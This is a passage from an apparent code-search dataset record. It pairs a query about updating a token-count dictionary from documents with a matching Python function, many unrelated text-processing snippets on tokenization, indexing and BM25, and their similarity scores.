self.assertEqual(2, len(u._commands))\n self.assertEqual(u.body,\n ('{\"add\": {\"doc\": {\"a\": 1}}'\n ',\"add\": {\"doc\": {\"b\": 2}}}'))", "def add_documents(self, documents):\n\t\t\n\t\t# flag for StopIteration exceptions\n\t\tmore_documents = True\n\t\t# loop while there are still documents in the iterator\n\t\twhile more_documents:\n\t\t\t# increment batch number\n\t\t\tbatch = len(self.batch_stats) + 1\n\t\t\t# count sentences\n\t\t\tsentences_count = 0\n\t\t\t# create temporary batch data file in the version directory\n\t\t\tbatch_file = os.path.join(self.file_base.get_version_path(self.version), \"data.jl.gz.temp\")\n\t\t\t# try to read the next batch of files, catch exception and stop if there are no more\n\t\t\ttry:\n\t\t\t\t# get next document before opening the file just to make sure it's there\n\t\t\t\tdocument = documents.next()\n\t\t\t\t# open the data file\n\t\t\t\twith gzip.open(batch_file, \"wb\") as outfile:\n\t\t\t\t\t# loop through DOCUMENT_BATCH_SIZE documents\n\t\t\t\t\tfor i in range(DocumentDatabase.DOCUMENT_BATCH_SIZE):\n\t\t\t\t\t\t# count sentences in document\n\t\t\t\t\t\tfor paragraph in document[\"paragraphs\"]:\n\t\t\t\t\t\t\tsentences_count += len(paragraph[\"sentences\"])\n\t\t\t\t\t\t# write JSON to file one line at a time\n\t\t\t\t\t\toutfile.write(\"%s\\n\" % json.dumps(document))\n\t\t\t\t\t\t# if we are not done with this batch, retrieve the next document\n\t\t\t\t\t\tif i < DocumentDatabase.DOCUMENT_BATCH_SIZE - 1:\n\t\t\t\t\t\t\tdocument = documents.next()\n\t\t\texcept StopIteration:\n\t\t\t\t# the end of the documents stream, set the flag to False\n\t\t\t\tmore_documents = False\n\t\t\t# make sure the batch isn't empty\n\t\t\tif sentences_count > 0:\n\t\t\t\t# create the new batch in the file system\n\t\t\t\tself.version_batches.create_latest_version()\n\t\t\t\t# add the stats to the statistics hash\n\t\t\t\tself.batch_stats[batch] = BatchStats(sentences_count)\n\t\t\t\t# write the batch statistics to file\n\t\t\t\twith codecs.open(self._get_batch_stat_file(batch), \"wb\", \"utf-8\") as outfile:\n\t\t\t\t\t# write the JSON representation for the stats\n\t\t\t\t\toutfile.write(json.dumps(self.batch_stats[batch].to_json()))\n\t\t\t\t# move the temp data file to the correct location inside the version folder\n\t\t\t\tos.rename(batch_file, self._get_batch_file(batch))", "def get_preprocessed_docs(formatted_docs):\r\n preprocessed_docs = {}\r\n for idx in formatted_docs.keys():\r\n preprocessed_docs[idx] = preprocess(formatted_docs[idx])\r\n return preprocessed_docs", "def load_flattened_documents(data_dir: str, docids: Set[str]) -> Dict[str, List[str]]:\n unflattened_docs = load_documents(data_dir, docids)\n flattened_docs = dict()\n for doc, unflattened in unflattened_docs.items():\n flattened_docs[doc] = list(chain.from_iterable(unflattened))\n return flattened_docs", "def build(self,documents):\n\t\tself.vectorKeywordIndex = self.getVectorKeywordIndex(documents)\n\n\t\tself.documentVectors = [self.createVector(document) for document in documents]", "def _build_token_dict(self, corpus: List[List[str]], min_count: int = 3):\n token2idx = {\n self.token_pad: 0,\n self.token_unk: 1,\n self.token_bos: 2,\n self.token_eos: 3\n }\n\n token2count = {}\n for sentence in corpus:\n for token in sentence:\n count = token2count.get(token, 0)\n token2count[token] = count + 1\n\n # 按照词频降序排序\n sorted_token2count = sorted(token2count.items(),\n key=operator.itemgetter(1),\n reverse=True)\n token2count = collections.OrderedDict(sorted_token2count)\n\n for token, token_count in token2count.items():\n if token not in token2idx and token_count >= min_count:\n token2idx[token] = len(token2idx)\n\n self.token2idx = token2idx\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def update_words(data, book_num):\n\tglobal word_count\n\t#find count of each word in the book and update the dictionary\n\tfor words in data:\n\t\tword_count[words][book_num] = (word_count.get(words,0)[book_num] + 1)\n\t#print(word_count)", "def generate_dict(self):\n dict = defaultdict(list)\n for i in range(self.no_of_docs-1):\n doc_txt = self.doc_to_df(i)\n #assign key to index in dictionary and its locations as tuples(docid,line,wordpos) as the values\n for j in range(len(doc_txt)):\n for k in range(doc_txt.shape[1]):\n key = doc_txt[k][j]\n dict[key].append((i,j,k))", "def set(self, doc, fields_values):\n fields_values = Object.from_bson(fields_values)\n for k,v in fields_values.items():\n self._set(doc, k.split('.'), v)\n impl = self._impl(doc)\n return impl.update({'_id':doc._id}, {'$set':fields_values})", "def parse_doc(self, doc_as_list):\n tweet_id = doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n retweet_text = doc_as_list[4]\n retweet_url = doc_as_list[5]\n quote_text = doc_as_list[6]\n quote_url = doc_as_list[7]\n term_dict = {}\n tokenized_text = self.parse_sentence(full_text)\n doc_length = len(tokenized_text) # after text operations.\n\n for i, term in enumerate(tokenized_text):\n if term not in term_dict.keys():\n term_dict[term] = [1, [i]]\n else:\n term_dict[term][0] += 1\n term_dict[term][1].append(i)\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, quote_text,\n quote_url, term_dict, doc_length)\n return document", "def extract(self, documents):\n\n # Feature vector to return\n features = np.zeros((len(documents), len(self.idx_to_word)))\n\n # Raise an exception if 'extract' is called before 'preprocess'\n if len(self.word_to_idx) == 0 or len(self.idx_to_word) == 0:\n raise Exception(\"Dictionary not initialised.\")\n\n # Iterate over all documents\n for idx, doc in enumerate(documents):\n # Split the doc into a list of words\n words = extract_words(doc)\n\n # For each word\n for w in words:\n # Calculate it's frequency, however, keep in mind\n # that this word may not have been in the training\n # corpus. In that case, ignore the word.\n ''' YOUR CODE HERE '''\n try:\n features[idx][self.word_to_idx[w]] = words.count(w)\n except KeyError:\n pass\n\n ''' END CODE FOR THIS LOOP '''\n\n # Divide the vector by the total number of words in the document to\n # normalize the frequencies.\n ''' YOUR CODE HERE '''\n features[idx] = features[idx]/len(words)\n ''' END CODE FOR THIS LOOP '''\n\n return features", "def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))", "def add(self, token_docid):\n token = token_docid[0]\n doc_id = token_docid[1]\n # collapse identical tokens together\n if token in self.posting:\n self.posting[token].append(doc_id)\n else:\n self.posting[token] = [doc_id]", "def __call__(self, doc: Doc) -> Doc:\n for val in self._get_vals(doc):\n key = self._get_key(val)\n try:\n self._table.get(key).append(val)\n except AttributeError:\n self._table.set(key, [val])\n self._size += 1\n return super().__call__(doc)", "def __parse_corpus(self, corpus):\n corpus = self.__handle_corpus_unkwon_words(corpus)\n start_token = ' '.join([NGramModel.START_SENTENCE_TOKEN]*(self.__n-1))\n word_list = corpus.replace(NGramModel.START_SENTENCE_TOKEN, start_token).split()\n \n for n in range(1, self.__n+1): \n self.__ngram_counts[n] = {}\n for ngram, count in Counter(self.__generate_n_grams(word_list, n)).items():\n self.__ngram_counts[n][' '.join(ngram)] = count", "def documents(self, **kw):\r\n \r\n doc_reader = self.doc_reader\r\n return (doc_reader[docnum] for docnum in self.document_numbers(**kw))", "def merge_all_claims_norm_dicts_for_docs(): \n# docs_norm_scores_dicts_path = base_path+\"\\\\docs_norm_scores_dicts\"\n docs_norm_scores_dicts_path = linux_base_path+\"/docs_norm_scores_dicts\"\n# all_claims_norms_scores_merged_dict = base_path +\"\\\\all_claims_norms_scores_merged_dict\"\n all_claims_norms_scores_merged_dict = linux_base_path +\"/all_claims_norms_scores_merged_dict\"\n for alpha in range(0,11,1):\n for beta in range(0,10,1):\n docs_scores_all_claims = {}\n for filename in os.listdir(docs_norm_scores_dicts_path):\n (alpha_f,beta_f)=turn_to_float([alpha,beta])\n if \"_alpha_\"+str(alpha_f)+\"_\" in filename and \"_beta_\"+str(beta_f)+\"_\" in filename:\n curr_dict = read_pickle(docs_norm_scores_dicts_path+\"/\"+filename)\n docs_scores_all_claims = dict(docs_scores_all_claims.items() + curr_dict.items()) #merge dicts\n save_pickle(all_claims_norms_scores_merged_dict+\"/docs_norm_scores_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f),docs_scores_all_claims)", "def tokenize_replace_pos(doc_list, language_code, replace_pos,\n core_num=multiprocessing.cpu_count()):\n param = [[d, language_code, replace_pos] for d in doc_list]\n pool = multiprocessing.Pool(core_num)\n return pool.map(_tokenize_replace_pos4map, param)", "def refine_tokens( self, tokens ):\n k = 1.75\n b = 0.75\n stop_words_file = \"stop_words.txt\"\n all_stopwords = list()\n refined_tokens_sources = dict()\n \n # collect all the stopwords\n with open( stop_words_file ) as file:\n lines = file.read()\n all_stopwords = lines.split( \"\\n\" )\n \n for source in tokens:\n refined_tokens = dict()\n files = dict()\n inverted_frequency = dict()\n file_id = -1\n total_file_length = 0\n for item in tokens[ source ]:\n file_id += 1\n file_tokens = tokens[ source ][ item ].split(\" \")\n if source in \"name_desc_edam_help\":\n file_tokens = utils._clean_tokens( file_tokens, all_stopwords )\n total_file_length += len( file_tokens )\n term_frequency = dict()\n for token in file_tokens:\n if token is not '':\n file_ids = list()\n if token not in inverted_frequency:\n file_ids.append( file_id )\n else:\n file_ids = inverted_frequency[ token ]\n if file_id not in file_ids:\n file_ids.append( file_id )\n inverted_frequency[ token ] = file_ids\n # for term frequency\n if token not in term_frequency:\n term_frequency[ token ] = 1\n else:\n term_frequency[ token ] += 1\n files[ item ] = term_frequency\n N = len( files )\n average_file_length = float( total_file_length ) / N\n # find BM25 score for each token of each tool. It helps to determine\n # how important each word is with respect to the tool and other tools\n for item in files:\n file_item = files[ item ]\n file_length = len( file_item )\n for token in file_item:\n tf = file_item[ token ]\n # normalize the term freq of token for each document\n tf = float( tf ) / file_length\n idf = np.log2( N / len( inverted_frequency[ token ] ) )\n alpha = ( 1 - b ) + ( float( b * file_length ) / average_file_length )\n tf_star = tf * float( ( k + 1 ) ) / ( k * alpha + tf )\n tf_idf = tf_star * idf\n file_item[ token ] = tf_idf\n # filter tokens based on the BM25 scores and stop words. Not all tokens are important\n for item in files:\n file_tokens = files[ item ]\n tokens_scores = [ ( token, score ) for ( token, score ) in file_tokens.items() ]\n sorted_tokens = sorted( tokens_scores, key=operator.itemgetter( 1 ), reverse=True )\n refined_tokens[ item ] = sorted_tokens\n tokens_file_name = 'tokens_' + source + '.txt'\n token_file_path = os.path.join( os.path.dirname( self.tools_data_path ) + '/' + tokens_file_name )\n with open( token_file_path, 'w' ) as file:\n file.write( json.dumps( refined_tokens ) )\n file.close()\n refined_tokens_sources[ source ] = refined_tokens\n return refined_tokens_sources", "def build_ngram_index(tokenized_documents, ngrams):\n dictionary = {}\n\n doc_ngrams = {}\n for doc in tokenized_documents:\n ngrams_freq = {}\n\n measures = nltk.collocations.BigramAssocMeasures()\n finder = BigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n \n measures = nltk.collocations.TrigramAssocMeasures()\n finder = TrigramCollocationFinder.from_words(tokenized_documents[doc])\n freqs = finder.ngram_fd\n for ngram in freqs:\n ngrams_freq[ngram] = freqs[ngram]\n\n doc_ngrams[doc] = ngrams_freq\n\n for ngram in ngrams:\n dictionary[ngram] = [0]\n for doc in doc_ngrams:\n if ngram in doc_ngrams[doc]:\n dictionary[ngram][0] += doc_ngrams[doc][ngram]\n dictionary[ngram].append((doc, doc_ngrams[doc][ngram]))\n \n return dictionary" ]
[ "0.68999934", "0.6873283", "0.6396484", "0.6270356", "0.6200283", "0.61873966", "0.61502284", "0.6042249", "0.6037067", "0.5998114", "0.59293014", "0.58950543", "0.5877849", "0.5844076", "0.58293545", "0.5767847", "0.57396615", "0.5730059", "0.5711739", "0.563978", "0.5620126", "0.5615571", "0.56092644", "0.5603466", "0.56021726", "0.5600261", "0.5598487", "0.55603933", "0.5559371", "0.55493385", "0.5548632", "0.55470467", "0.5522555", "0.55198544", "0.55169094", "0.55155396", "0.5506191", "0.55021423", "0.54889655", "0.5485269", "0.5481285", "0.54811215", "0.546951", "0.5465656", "0.54644924", "0.54629964", "0.5460012", "0.54479206", "0.5440121", "0.54227835", "0.5421363", "0.5409679", "0.5388636", "0.5374139", "0.53666866", "0.53637534", "0.5349924", "0.5345804", "0.53425455", "0.534189", "0.5330862", "0.53307176", "0.53249925", "0.5320999", "0.53199095", "0.5316637", "0.5293466", "0.5287339", "0.5282561", "0.5279928", "0.52778906", "0.52778906", "0.5275979", "0.52614784", "0.5259829", "0.5256893", "0.5256046", "0.52554494", "0.5247021", "0.5243727", "0.5235125", "0.52288884", "0.5227093", "0.5222334", "0.52207357", "0.5218011", "0.52138984", "0.52111065", "0.5208889", "0.5208375", "0.5207914", "0.52025336", "0.5198126", "0.5186816", "0.51824564", "0.5160686", "0.5158809", "0.51471984", "0.51395386", "0.5131306" ]
0.67038983
2
Update dictionary from a collection of documents. Each document is a list of tokens.
def add_document_lists(self, docs): for sent in docs: sent = map(self.process_token, sent) self._token_count.update(sent)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_documents(self, docs):\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)", "def add_documents(self, docs):\n if 'sentences' in docs:\n for sent in docs.sentences:\n sent = map(self.process_token, [t for t in sent.tokens if not t.is_stopword])\n self._token_count.update(sent)\n\n else:\n sent = list(map(self.process_token, [t for t in docs.tokens if not t.is_stopword]))\n self._token_count.update(sent)", "def add_to_dict(self, tokens):\n# TODO: ?add normalization of a token?\n for token in tokens:\n if self.embedding_words and (token not in self.embedding_words):\n continue\n self.freq[token] += 1\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token", "def update(tokens):\n global TOKENS\n\n for token_id in tokens:\n\n if token_id not in TOKENS:\n TOKENS[token_id] = {}\n\n if isinstance(tokens, dict):\n token_info = tokens[token_id]\n if token_info is None:\n token_info = {}\n\n alias = token_info.get(\"alias\")\n if alias is not None:\n TOKENS[token_id][\"alias\"] = alias\n\n decimals = token_info.get(\"decimals\")\n if decimals is not None:\n TOKENS[token_id][\"decimals\"] = decimals", "def intern_documents(documents: Dict[str, List[List[str]]], word_interner: Dict[str, int], unk_token: str):\n ret = dict()\n unk = word_interner[unk_token]\n for docid, sentences in documents.items():\n ret[docid] = [[word_interner.get(w, unk) for w in s] for s in sentences]\n return ret", "def update_existing(doc_data_tples):\n def per_doc(doc, data_tples):\n def per_field(data_tple):\n field, datas = data_tple\n map(_do_append_field(doc, field), datas)\n map(per_field, data_tples)\n return doc\n\n __docs = ( (per_doc(doc, data_tples), data_tples) for doc,data_tples in doc_data_tples )\n return __docs", "def updateDocumentAll(self, documents):\n docs = []\n for document in documents:\n if isinstance(document, couch.Document):\n document = document.getData()\n\n # these are required params\n if \"_id\" not in document or \"_rev\" not in document:\n raise Exception(\"Both _id & _rev fields are required!\")\n\n docs.append(document)\n\n return self.client.post(self.name +\"/_bulk_docs\", None,\n {\"docs\": docs}).getBodyData()", "def update_from_document(self, document_path):\n with open(document_path, 'r') as document_file:\n for sentence in document_file:\n words = sentence.strip().split()\n for word in words:\n self._add_new_word(word)", "def preprocess(self, documents):\n\n # A dict storing the frequency of each word\n word_freq = {}\n\n # Iterate for each document\n for doc in documents:\n # Split the document into a list of words and iterate on it\n for w in extract_words(doc):\n # Update word frequencies\n '''YOUR CODE HERE'''\n if w not in word_freq.keys():\n word_freq[w] = 1\n else:\n word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n\n # A set of words with frequency less than 'self.min_freq'\n remove_words = set()\n\n # Check frequency of each word and add to 'remove_words'\n # if it's frequency is below self.min_freq\n\n ''' YOUR CODE HERE '''\n for w in word_freq.keys():\n if word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'word_freq'\n for w in remove_words:\n del word_freq[w]\n\n # Fill 'self.word_to_idx' and 'self.idx_to_word' for\n # each word in 'word_freq' (dicts are explained above)\n\n i = 0\n for w in word_freq.keys():\n self.word_to_idx[w] = i\n self.idx_to_word[i] = w \n i += 1\n\n ''' END YOUR CODE HERE '''", "def fit(self, documents):\n # Get a list of all the unique tokens that appear\n vocab = list({\n token for doc in documents\n for token in self.tokenizer(doc)\n if token not in self._word2index\n })\n\n # This is UNK, START, END, and PAD.\n nb_special_tokens = 4\n\n # First, we map token -> ID, leaving the first slots for special tokens\n self._word2index.update({\n word: idx\n for idx, word in enumerate(vocab, nb_special_tokens)\n })\n\n # Next, we invert this map, which we can do since it was built from\n # unique vocabulary elements and is by definition bijective.\n self._index2word.update({\n idx: word\n for word, idx in self._word2index.items()\n })\n\n return self", "def multiple_document_processing(self) -> List:\n batch_list = []\n for doc, idx in self.__documents:\n entities_idx = {'idx': idx}\n entities_result = self.create_entity(document=doc)\n word_cleaned = self.clean_words(doc)\n entities_idx[self.key_spacy_text] = str(word_cleaned)\n entities_idx.update(entities_result)\n batch_list.append(entities_idx)\n return batch_list", "def get_doc_dicts(self, doc_ids):\n pass", "def updateMultipleDocuments(cred, payload):\n\n url = cred.base_url + \"documents:commit\"\n data = { 'writes': [] }\n\n for path, fieldData in payload.iteritems():\n pathData = createFirestoreDataObject(cred, path, fieldData)\n data['writes'].append(pathData)\n \n makeRequest(cred, url, 'POST', data)", "def add_doc_in_posting_list(word_posting_list, docs):\n for doc_score in docs:\n if doc_score[\"doc\"] in word_posting_list.keys():\n word_posting_list[doc_score[\"doc\"]] = int(doc_score[\"score\"]) + int(word_posting_list[doc_score[\"doc\"]])\n else:\n word_posting_list[doc_score[\"doc\"]] = doc_score[\"score\"]", "def load(self, documents, uniquify=False):\n assert documents, \"missing list of documents, text single doc per line\"\n assert isinstance(documents, list), \"documents must be list\"\n assert isinstance(documents[0], list), \"each document is also a list\"\n #--------------------------------------------------------------------------------------------\n\n def _get_new_counts(document):\n return Counter(document) if not uniquify else Counter(list(set(document)))\n\n for idx, document in enumerate(documents):\n new_counter = _get_new_counts(document)\n self.counter.update(new_counter)\n if idx % 1000 == 0:\n print(\"load: {}\\r\".format(idx), end='')\n return self", "def parse_doc(self, doc_as_list):\n\n tweet_id = doc_as_list[0]\n tweet_date = doc_as_list[1]\n full_text = doc_as_list[2]\n url = doc_as_list[3]\n indice = doc_as_list[4]\n retweet_text = doc_as_list[5]\n retweet_url = doc_as_list[6]\n retweet_indice = doc_as_list[7]\n quote_text = doc_as_list[8]\n quote_url = doc_as_list[9]\n quoted_indice = doc_as_list[10]\n retweet_quoted_text = doc_as_list[11]\n retweet_quoted_url = doc_as_list[12]\n retweet_quoted_indice = doc_as_list[13]\n\n term_dict = {}\n\n tokenized_text = self.parse_sentence(full_text)\n tokenized_quote = self.parse_sentence(quote_text)\n # tokenized_url = self.handle_url(url)\n\n\n doc_length = len(tokenized_text) # after text operations - length of full_text\n\n new_tokenized_text = tokenized_text + tokenized_quote\n\n # spell checker\n # new_tokenized_text = self.spell.update(new_tokenized_text)\n\n for term in new_tokenized_text:\n if term is not \"\": # or (term.isalpha() and len(term) == 1)\n if term not in term_dict:\n term_dict[term] = 1\n else:\n term_dict[term] += 1\n\n document = Document(tweet_id, tweet_date, full_text, url, retweet_text, retweet_url, quote_text,\n quote_url, term_dict, doc_length)\n return document", "def prepare_dictionary_from_docs(self):\n if os.path.exists(self.DICT_PATH):\n return True\n self.logger.info(\"START PREPARING DICT\")\n for fn in os.listdir(self.wiki_path):\n self.logger.info(\"dict update {0}\".format(fn))\n content = self.get_processed_content(fn)\n self.dictionary.add_documents([content])\n self.dictionary.filter_extremes(no_below=20, no_above=0.1, keep_n=100000)\n self.dictionary.compactify()\n self.dictionary.save(self.DICT_PATH)\n return True", "def get_dict(cleaned_docs):\n data = []\n for doc in cleaned_docs:\n data += doc\n return list(set(data))", "def transform(self, docs):\n return [doc for doc in docs]", "def doc2bow(self, document, allow_update=False, return_missing=False):\n\n doc=[t.text for t in document.tokens]\n\n if isinstance(doc, string_types):\n raise TypeError(\"doc2bow expects an array of unicode tokens on input, not a single string\")\n\n # Construct (word, frequency) mapping.\n counter = defaultdict(int)\n for w in doc:\n counter[w if isinstance(w, str) else str(w, 'utf-8')] += 1\n\n token2id = self.token2id\n if allow_update or return_missing:\n missing = sorted(x for x in iteritems(counter) if x[0] not in token2id)\n if allow_update:\n for w, _ in missing:\n # new id = number of ids made so far;\n # NOTE this assumes there are no gaps in the id sequence!\n token2id[w] = len(token2id)\n result = {token2id[w]: freq for w, freq in iteritems(counter) if w in token2id}\n\n if allow_update:\n self.num_docs += 1\n self.num_pos += sum(itervalues(counter))\n self.num_nnz += len(result)\n # keep track of document and collection frequencies\n for tokenid, freq in iteritems(result):\n self.cfs[tokenid] = self.cfs.get(tokenid, 0) + freq\n self.dfs[tokenid] = self.dfs.get(tokenid, 0) + 1\n\n # return tokenids, in ascending id order\n result = sorted(iteritems(result))\n if return_missing:\n return result, dict(missing)\n else:\n return result", "def _build_token_dict(self, corpus: List[List[str]]):\n self.token2idx = self.load_from_vocab_file(self.vocab_path)\n self.idx2token = dict([(value, key)\n for key, value in self.token2idx.items()])\n logging.debug(f\"build token2idx dict finished, contains {len(self.token2idx)} tokens.\")\n self.dataset_info['token_count'] = len(self.token2idx)", "def docs2ids(self):\n self.docs = [ [self.vocab[word] for word in doc] for doc in self.docs]", "def update_all(cls, documents: List[dict]) -> (List[dict], List[dict]):\n if not documents:\n raise ValidationFailed([], message=\"No data provided.\")\n\n if not isinstance(documents, list):\n raise ValidationFailed(documents, message=\"Must be a list.\")\n\n new_documents = copy.deepcopy(documents)\n\n errors = cls.validate_and_deserialize_update(new_documents)\n if errors:\n raise ValidationFailed(documents, errors)\n\n try:\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Updating {new_documents}...\")\n previous_documents, updated_documents = cls._update_many(new_documents)\n if cls.logger.isEnabledFor(logging.DEBUG):\n cls.logger.debug(f\"Documents updated to {updated_documents}.\")\n return (\n [cls.serialize(document) for document in previous_documents],\n [cls.serialize(document) for document in updated_documents],\n )\n except pymongo.errors.DuplicateKeyError:\n raise ValidationFailed(\n [cls.serialize(document) for document in documents],\n message=\"One document already exists.\",\n )", "def load_documents(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n if os.path.exists(os.path.join(data_dir, 'docs.jsonl')):\n assert not os.path.exists(os.path.join(data_dir, 'docs'))\n return load_documents_from_file(data_dir, docids)\n\n docs_dir = os.path.join(data_dir, 'docs')\n res = dict()\n if docids is None:\n docids = sorted(os.listdir(docs_dir))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n with open(os.path.join(docs_dir, d), 'r') as inf:\n lines = [l.strip() for l in inf.readlines()]\n lines = list(filter(lambda x: bool(len(x)), lines))\n tokenized = [list(filter(lambda x: bool(len(x)), line.strip().split(' '))) for line in lines]\n res[d] = tokenized\n return res", "def load_documents_from_file(data_dir: str, docids: Set[str] = None) -> Dict[str, List[List[str]]]:\n docs_file = os.path.join(data_dir, 'docs.jsonl')\n documents = load_jsonl(docs_file)\n documents = {doc['docid']: doc['document'] for doc in documents}\n res = dict()\n if docids is None:\n docids = sorted(list(documents.keys()))\n else:\n docids = sorted(set(str(d) for d in docids))\n for d in docids:\n lines = documents[d].split('\\n')\n tokenized = [line.strip().split(' ') for line in lines]\n res[d] = tokenized\n return res", "def initialize_terms_and_postings():\n global dictionary, postings\n for id in document_filenames:\n document = getDocumentContent(document_filenames[id])\n if(document_filenames[id].rfind(\".pdf\") == len(document_filenames[id]) - 4):\n terms = tokenize(document.encode('utf-8'))\n if(document_filenames[id].rfind(\".txt\") == len(document_filenames[id]) - 4):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".docx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n if(document_filenames[id].rfind(\".pptx\") == len(document_filenames[id]) - 5):\n terms = tokenize(document)\n unique_terms = set(terms)\n dictionary = dictionary.union(unique_terms)\n for term in unique_terms:\n postings[term][id] = terms.count(term) # the value is the\n # frequency of the\n # term in the\n # document", "def _create_dictionary(self, document_set):\n words = self._normalize_words(document_set.words)\n unique_words = frozenset(words)\n return dict((word, idx) for idx, word in enumerate(unique_words))", "def set_keyword_map(self):\n \n ret = defaultdict(list)\n for idx, doc in enumerate(self.docs):\n for token in doc:\n if token in self.dictionary.token2id:\n ret[token].append(idx)\n \n self.keyword_map = ret\n return ret", "def clean_docs(self,docs):\n\n # Remove numbers, but not words that contain numbers.\n docs = [[token for token in doc if not token.isnumeric()] for doc in docs]\n\n # Remove words that are only one character.\n docs = [[token for token in doc if len(token) > 1 and token not in stop_words] for doc in docs]\n\n # lemmatizer = WordNetLemmatizer()\n # docs = [[lemmatizer.lemmatize(token) for token in doc] for doc in docs]\n\n # Add bigrams and trigrams to docs (only ones that appear 20 times or more).\n bigram = Phrases(docs, min_count=20)\n for idx in range(len(docs)):\n for token in bigram[docs[idx]]:\n if '_' in token:\n # Token is a bigram, add to document.\n docs[idx].append(token)\n\n # Create a dictionary representation of the documents.\n dictionary = Dictionary(docs)\n\n # Filter out words that occur less than 20 documents, or more than 50% of the documents.\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # Bag-of-words representation of the documents.\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return docs,dictionary,corpus", "def add_new_doc(self, document, documents_list_length=10000):\n\n try:\n document_dictionary = document.term_doc_dictionary\n # self.countDoc += 1\n for term in document_dictionary.keys():\n if self.stemming == 'y':\n my_stemmer = Stemmer()\n term = my_stemmer.stem_term(term)\n # Update inverted index and posting\n if term not in self.inverted_idx.keys():\n self.inverted_idx[term] = [1, [\n (document_dictionary[term], document.tweet_id)]] # amount of doc, freq in the doc, doc id.\n\n else:\n self.inverted_idx[term][0] += 1 # amount of doc\n self.inverted_idx[term][1].append((document_dictionary[term],\n document.tweet_id)) # freq in the doc # doc id\n\n if term not in self.postingDict.keys():\n self.postingDict[term] = [(document.tweet_id, document_dictionary[term])]\n else:\n self.postingDict[term].append((document.tweet_id, document_dictionary[term]))\n # self.countTweet -= 1\n\n if document.tweet_id not in self.tweet_dict.keys():\n self.tweet_dict[document.tweet_id] = [[term, document_dictionary[term]], 1,\n 0] # [term,freq in tweet], amount of unique terms in tweet, amount of terms in tweet\n elif document_dictionary[term] > self.tweet_dict[document.tweet_id][0][\n 1]: # tweet exist, compering between freq in two terms\n if self.tweet_dict[document.tweet_id][0][\n 1] == 1: # before change term check if the last term is unique\n self.tweet_dict[document.tweet_id][\n 1] += 1 # last term is unique: add to the amount of uniqe terms in tweet\n self.tweet_dict[document.tweet_id][0] = [term,\n document_dictionary[term]] # change between the terms\n self.tweet_dict[document.tweet_id][2] += 1\n elif document_dictionary[term] == 1: # tweet exist, not most common, check if unique\n self.tweet_dict[document.tweet_id][1] += 1\n self.tweet_dict[document.tweet_id][2] += 1\n except:\n # print('problem in indexer : add_new_doc')\n # print(traceback.print_exc())\n pass", "def add(self, document):\n #words=[word.lower() for word in words if word.isalpha()] #added on 0415\n for token in [t.lower() for t in nltk.word_tokenize(document)]:\n if not token.isalpha():\n continue\n\n if token in self.stopwords:\n continue\n \n if self.stemmer:\n token = self.stemmer.stem(token)\n \n if self.__unique_id not in self.index[token]:\n self.index[token].append(self.__unique_id)\n \n self.documents[self.__unique_id] = document\n self.__unique_id += 1", "def preprocess(self, documents):\n\n # Store the total number of documents\n num_docs = np.float(len(documents))\n\n # A dict storing the frequency of each word across all documents\n total_word_freq = {}\n\n # A dict storing the number of documents that word appears in\n doc_word_freq = {}\n\n # Iterate over all documents\n for doc in documents:\n # Split the string into a list of words\n words = extract_words(doc)\n\n # Update the 'total_word_freq' dict using all words in 'words'\n for w in words:\n ''' YOUR CODE HERE '''\n if w not in total_word_freq.keys():\n total_word_freq[w] = 1\n else:\n total_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # Update the 'doc_word_freq' dict. Remember to only add '1' corresponding to\n # each word in a document. In case a word appears twice in a document, then\n # it should be ignored. We use the set() data structure to achieve this.\n for w in set(words):\n ''' YOUR CODE HERE '''\n if w not in doc_word_freq:\n doc_word_freq[w] = 1\n else:\n doc_word_freq[w] += 1\n\n ''' END CODE FOR THIS LOOP '''\n\n # A set of words with total frequency less than 'self.min_freq'\n remove_words = set()\n\n ''' YOUR CODE HERE '''\n\n # Check frequency of each word and add to 'remove_words'\n for w in total_word_freq.keys():\n if total_word_freq[w] < self.min_freq:\n remove_words.add(w)\n\n # Delete the words in 'remove_words' from 'total_word_freq' and\n # 'doc_word_freq'.\n for w in remove_words:\n del total_word_freq[w]\n del doc_word_freq[w]\n\n # Create a numpy array to store frequencies from which\n # we can create the 'self.idf' preprocessed numpy array.\n word_freq_tensor = np.zeros(len(doc_word_freq))\n\n # For each word in 'doc_word_freq' dict, update\n # 'self.word_to_idx' and 'self.idx_to_word' and\n # 'word_freq_tensor'.\n i = 0\n for w in doc_word_freq.keys():\n self.word_to_idx[w] = i \n self.idx_to_word[i] = w\n word_freq_tensor[i] = doc_word_freq[w]\n i+=1\n \n #print(word_freq_tensor.shape)\n #print(word_freq_tensor)\n # Calculate 'self.idf' (see hint.pdf for formula)\n self.idf = -1*np.log(word_freq_tensor/(len(documents)))\n ''' END YOUR CODE HERE '''", "def process_new_tokens(tokens,processed_tokens_set, model, dictionary):\n if hasattr(model, 'using_pretrained') and model.using_pretrained is not None:\n processed_tokens_set.update(tokens)\n update_embedding_layer(processed_tokens_set, model, dictionary)", "def process_document(text):\n words = 